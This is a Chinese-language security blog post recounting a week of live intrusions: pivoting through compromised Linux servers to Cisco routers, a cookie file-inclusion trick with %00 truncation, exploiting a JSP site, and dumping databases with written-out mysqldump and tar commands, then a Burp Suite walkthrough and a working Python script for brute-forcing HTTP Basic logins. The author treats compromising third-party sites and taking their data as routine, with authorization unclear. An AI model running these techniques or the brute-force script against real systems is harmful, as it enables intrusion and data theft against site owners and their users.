<!doctype html>



  


<html class="theme-next mist use-motion">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>




<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />












  
  
  <link href="/vendors/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/vendors/font-awesome/css/font-awesome.min.css?v=4.4.0" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.0.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="Hexo, NexT" />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.0.1" />






<meta name="description">
<meta property="og:type" content="article">
<meta property="og:title" content="一星期实战总结（三）">
<meta property="og:url" content="http://yoursite.com/2017/03/18/一星期实战总结（三）/index.html">
<meta property="og:site_name" content="EvilAnne's Blog">
<meta property="og:description">
<meta property="og:image" content="http://i.imgur.com/kf2vOr6.jpg">
<meta property="og:image" content="http://i.imgur.com/P4vhK7L.jpg">
<meta property="og:image" content="http://i.imgur.com/nOtBT53.jpg">
<meta property="og:image" content="http://i.imgur.com/m07FJrz.jpg">
<meta property="og:image" content="http://i.imgur.com/E5IgaFS.jpg">
<meta property="og:image" content="http://i.imgur.com/PLJKKfb.jpg">
<meta property="og:image" content="http://i.imgur.com/BpcjznC.jpg">
<meta property="og:updated_time" content="2017-03-18T04:31:03.531Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="一星期实战总结（三）">
<meta name="twitter:description">
<meta name="twitter:image" content="http://i.imgur.com/kf2vOr6.jpg">



<script type="text/javascript" id="hexo.configuration">
  var NexT = window.NexT || {};
  var CONFIG = {
    scheme: 'Mist',
    sidebar: {"position":"left","display":"post"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: 0,
      author: '博主'
    }
  };
</script>

<script>
    (function(){
        if(''){
            if (prompt('请输入文章密码') !== ''){
                alert('密码错误！');
                history.back();
            }
        }
    })();
</script>

  <title> 一星期实战总结（三） | EvilAnne's Blog </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  










  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta ">
  

  <div class="custom-logo-site-title">
    <a href="/"  class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">EvilAnne's Blog</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle"></p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      

      
    </ul>
  

  
</nav>

 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  
  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                一星期实战总结（三）
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            <span class="post-meta-item-icon">
              <i class="fa fa-calendar-o"></i>
            </span>
            <span class="post-meta-item-text">发表于</span>
            <time itemprop="dateCreated" datetime="2017-03-18T12:14:44+08:00" content="2017-03-18">
              2017-03-18
            </time>
          </span>

          
            <span class="post-category" >
              &nbsp; | &nbsp;
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
              
                <span itemprop="about" itemscope itemtype="https://schema.org/Thing">
                  <a href="/categories/网络安全/" itemprop="url" rel="index">
                    <span itemprop="name">网络安全</span>
                  </a>
                </span>

                
                

              
            </span>
          

          
            
              <span class="post-comments-count">
                &nbsp; | &nbsp;
                <a href="/2017/03/18/一星期实战总结（三）/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count ds-thread-count" data-thread-key="2017/03/18/一星期实战总结（三）/" itemprop="commentsCount"></span>
                </a>
              </span>
            
          

          

          
          

          
        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <p><img src="http://i.imgur.com/kf2vOr6.jpg" alt=""></p>
<a id="more"></a>
<p>渗透不等于找漏洞，而是达到目的才可以被称为渗透成功。就算你拿下了服务器里面没有价值的数据也是无用、也等于失败。</p>
<p>这段时间搞的站点比较多，也找到许多站的洞，都是被各种限制没有达到目的，这里写出这个有意思的实战经过。</p>
<hr>
<p>之前获取了某服务商两台Linux机器，简称A、B，A服务器里面有某业务平台，只可惜密码无法解出来登不进后台，B服务器两张网卡，一张连接于内网，通过Socks5代理，扫了一些网段得到两台Cisco路由器可执行命令，其它暂时都没有找到其它机器，从Cisco看到vlan划分，争取下个星期把这个内网搞定吧。</p>
<p>某域商名子站，比较有意思的是，在COOKIES中的选择语言存在文件包含，只可惜普通用户，<br><img src="http://i.imgur.com/P4vhK7L.jpg" alt=""><br>这里后面加了<code>%00.jpg</code>，是因为包含的时候后面还有程序后缀如这样<code>lang=luange.php</code>把<code>.</code>号给截断。</p>
<p>然后星期四早上发来一批列表，好像又是诈骗的，看了目标站是<code>WordPress</code>和<code>CloudFlare CDN</code>，通过大牛给我的工具，结果扫描，发现对应一个源码包，下载回来分析，得到mysql数据库密码、以及<code>Cpanel</code>控制管理面板，<code>Cpanel</code>是国外比较出名的虚拟主机管理系统，数据库管理是在登录<code>Cpanel</code>才能看得到，无法直接访问，没有思路暂搞有关联的站点。<br>然后像赌博的站点，存在<code>phpMyadmin</code>，然后找到备份文件连接进去把数据库脱了出来，然后继续撸其它站点，一个阿里云服务器，网站程序是电商，看了一下使用jsp，就用前段时间爆出来的漏洞就秒了，把<code>last</code>记录先拖出来，然后把源码下回来分析，发现数据库在阿里云里面，也是内网，因为服务器外网连接不了SSH，后来想了很久，通过mysql命令无回显执行<code>mysql -uroot -p123456 -e &quot;show database&quot;</code>，再接着导出数据库：<code>mysqldump -uroot -p123456 dbname &gt; /tmp/sql.sql</code>,通过<code>tar czvf ./sql.tar.gz ./sql.sql</code> 把3G多的数据库打包成400mb,发现这命令挺好用的。目标达成继续换下一个站点。<br>看都懒着看了，这么多洞，把后台数据库脱了出来，通过<code>hash-id</code>识别是<code>SHA-256</code>所以没有办法解密，就把数据库大部分信息拖了出来。</p>
<p>因为搞这批列表是某局要搞的，当时发过来的信息猜测，应该是被人搞过一遍了，没发现多少信息，之前遇到<code>Wordpress</code>或者<code>CloudFlare CDN</code>都会放弃，曾经我也是这样觉得没什么希望，但是现在的我不一样，就算再难搞的站，我也会趴下一些信息。也不会放弃，最后也没有继续深入去发现更多的有关联的东西，因为也只是义务帮别人搞。</p>
<p>总结：很多站点找到了漏洞，找到了一个点没有去思考和深入，这也是我所欠缺的，绕过这些问题，去思考这是我目前要做的。<br>其次发现字典是渗透中非常重要，根据哪一套系统能扫出什么，包括遇到<code>HTTP Basic</code>还是<code>MSSQL</code>或者其它服务还有机会去尝试,<code>爆破的艺术</code></p>
<hr>
<h3 id="HTTP-Basic-认证爆破"><a href="#HTTP-Basic-认证爆破" class="headerlink" title="HTTP Basic 认证爆破"></a>HTTP Basic 认证爆破</h3><p><img src="http://i.imgur.com/nOtBT53.jpg" alt=""></p>
<p>经常搞站会碰到这种401认证登录，这里在网上找了段HTTP Basic认证代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="keyword">if</span> (!<span class="keyword">isset</span>($_SERVER[<span class="string">'PHP_AUTH_USER'</span>])) &#123;</span><br><span class="line">        header(<span class="string">"WWW-Authenticate: Basic realm=\"My Private Area\""</span>);</span><br><span class="line">        header(<span class="string">"HTTP/1.0 401 Unauthorized"</span>);</span><br><span class="line">        <span class="keyword">print</span> <span class="string">"You need valid credentials to get access!\n"</span>;</span><br><span class="line">        <span class="keyword">exit</span>;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">if</span> (($_SERVER[<span class="string">'PHP_AUTH_USER'</span>] == <span class="string">'admin'</span>) &amp;&amp; ($_SERVER[<span class="string">'PHP_AUTH_PW'</span>] == <span class="string">'123456'</span>)) &#123;</span><br><span class="line">            <span class="keyword">print</span> <span class="string">"Welcome to the private area!"</span>;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            header(<span class="string">"WWW-Authenticate: Basic realm=\"My Private Area\""</span>);</span><br><span class="line">            header(<span class="string">"HTTP/1.0 401 Unauthorized"</span>);</span><br><span class="line">            <span class="keyword">print</span> <span class="string">"You need valid credentials to get access!\n"</span>;</span><br><span class="line">            <span class="keyword">exit</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>经常碰到这种特别是路由器、phpmyadmin、后台、等都会遇到过，每次都放弃并没有去尝试爆破，为了提升自己不管不起眼的地方我都不会放弃了。奇迹总是会有的。</p>
<h3 id="通过BurpSuite来爆破"><a href="#通过BurpSuite来爆破" class="headerlink" title="通过BurpSuite来爆破"></a>通过BurpSuite来爆破</h3><p>HTTP Basic认证密码是这样的类型：<code>admin:123456</code>，然后转义成base64进行<code>Authorization</code>认证</p>
<p>BurpSuite发送<code>Intruder</code>模块<br><img src="http://i.imgur.com/m07FJrz.jpg" alt=""></p>
<p>设置灶爆破标识</p>
<p>在 Payload 设置中类型选择 <code>Custom iterator</code><br><img src="http://i.imgur.com/E5IgaFS.jpg" alt=""><br>认证信息是类似 <code>username:password</code> 的形式，所示我们需要在 <code>Payload</code> 选项里设置两个 <code>Position</code>，每个 <code>Position</code> 之间使用 <code>:</code>隔开。</p>
<p><img src="http://i.imgur.com/PLJKKfb.jpg" alt=""></p>
<p>之后设置 <code>Position 2</code>为密码字典,然后在 <code>Payload Processing</code> 里添加一条规则，进行 Base64 编码<br><img src="http://i.imgur.com/BpcjznC.jpg" alt=""></p>
<p>最后去掉底下的 <code>Payload Encoding</code> 选项,不让 <code>Burp suite</code> 把我们的编码后数据中的等号在进行 URL 编码了。</p>
<h3 id="通过Python脚本实现"><a href="#通过Python脚本实现" class="headerlink" title="通过Python脚本实现"></a>通过Python脚本实现</h3><p>上面是参考了别人博客知道了通过BurpSuite去爆破，但是每次这样设置太麻烦了，所以就写了个脚本。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> threading</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">http_dict</span><span class="params">(userfile,passfile)</span>:</span></span><br><span class="line">	<span class="keyword">with</span> open(userfile) <span class="keyword">as</span> f_username:</span><br><span class="line">		<span class="keyword">for</span> x <span class="keyword">in</span> f_username:</span><br><span class="line">			username = x.strip()</span><br><span class="line">			<span class="keyword">with</span> open(passfile) <span class="keyword">as</span> f_password:</span><br><span class="line">				<span class="keyword">for</span> i <span class="keyword">in</span> f_password:</span><br><span class="line">					password = i.strip()</span><br><span class="line">					http_auth_dict = <span class="string">'&#123;&#125;:&#123;&#125;'</span>.format(username,password)</span><br><span class="line">					encode_base64 = base64.b64encode(http_auth_dict.encode(encoding=<span class="string">'utf-8'</span>))</span><br><span class="line">					base64_string = str(encode_base64, <span class="string">'utf-8'</span>)</span><br><span class="line">					<span class="keyword">yield</span> base64_string</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">attack_http</span><span class="params">(url,userfile,passfile)</span>:</span></span><br><span class="line">	<span class="keyword">for</span> x <span class="keyword">in</span> http_dict(userfile,passfile):</span><br><span class="line">		headers = &#123;</span><br><span class="line">			<span class="string">'Authorization'</span>: <span class="string">'Basic &#123;&#125;'</span>.format(x),</span><br><span class="line">			<span class="string">'User-Agent'</span>: <span class="string">'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'</span>,</span><br><span class="line">			<span class="string">'Accept'</span>: <span class="string">'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'</span>,</span><br><span class="line">			<span class="string">'Accept-Encoding'</span>: <span class="string">'gzip, deflate, sdch'</span></span><br><span class="line">		&#125;</span><br><span class="line">		r = requests.get(url,headers=headers)</span><br><span class="line">		request_stat_code = r.status_code</span><br><span class="line">		<span class="keyword">if</span> request_stat_code == <span class="number">200</span>:</span><br><span class="line">			print(<span class="string">'&#123;&#125; -&gt; &#123;&#125;'</span>.format(str(base64.b64decode(x),<span class="string">'utf-8'</span>),request_stat_code))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">	url = <span class="string">'http://192.168.3.22/http_auth.php'</span></span><br><span class="line">	userfile = <span class="string">'username.txt'</span></span><br><span class="line">	passfile = <span class="string">'password.txt'</span></span><br><span class="line">	t = threading.Thread(target=attack_http,args=(url,userfile,passfile))</span><br><span class="line">	t.start()</span><br></pre></td></tr></table></figure>

      
    </div>

    <div>
      
        
      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/03/11/一星期实战总结（二）/" rel="next" title="一星期实战总结（二）">
                <i class="fa fa-chevron-left"></i> 一星期实战总结（二）
              </a>
            
          </div>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/03/25/一星期实战总结（四）/" rel="prev" title="一星期实战总结（四）">
                一星期实战总结（四） <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div class="ds-thread" data-thread-key="2017/03/18/一星期实战总结（三）/"
           data-title="一星期实战总结（三）" data-url="http://yoursite.com/2017/03/18/一星期实战总结（三）/">
      </div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel ">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/avatar.png"
               alt="EvilAnne" />
          <p class="site-author-name" itemprop="name">EvilAnne</p>
          <p class="site-description motion-element" itemprop="description">比天赋更重要的是变强起来的勇气</p>
        </div>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives">
              <span class="site-state-item-count">110</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          
            <div class="site-state-item site-state-categories">
              <a href="/categories">
                <span class="site-state-item-count">10</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags">
                <span class="site-state-item-count">8</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
        </div>

        
        

        
        

      </section>

      
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">
            
              
            
            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#HTTP-Basic-认证爆破"><span class="nav-number">1.</span> <span class="nav-text">HTTP Basic 认证爆破</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#通过BurpSuite来爆破"><span class="nav-number">2.</span> <span class="nav-text">通过BurpSuite来爆破</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#通过Python脚本实现"><span class="nav-number">3.</span> <span class="nav-text">通过Python脚本实现</span></a></li></ol></div>
            
          </div>
        </section>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>
<div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">EvilAnne</span>
</div>

<div class="powered-by">
  由 <a class="theme-link" href="http://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  </a>
  <span id="busuanzi_container_site_pv">访问量<span id="busuanzi_value_site_pv"></span>次</span>
</div>

        

        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  



  
  <script type="text/javascript" src="/vendors/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/vendors/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/vendors/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.0.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.0.1"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.0.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.0.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.0.1"></script>



  

  
    
  

  <script type="text/javascript">
    var duoshuoQuery = {short_name:"http://evilanne.duoshuo.com"};
    (function() {
      var ds = document.createElement('script');
      ds.type = 'text/javascript';ds.async = true;
      ds.id = 'duoshuo-script';
      ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
      ds.charset = 'UTF-8';
      (document.getElementsByTagName('head')[0]
      || document.getElementsByTagName('body')[0]).appendChild(ds);
    })();
  </script>

  
    
      
      <script src="/vendors/ua-parser-js/dist/ua-parser.min.js?v=0.7.9"></script>
      <script src="/js/src/hook-duoshuo.js"></script>
    
  





  
  
  

  

  
 
  

</body>
</html>
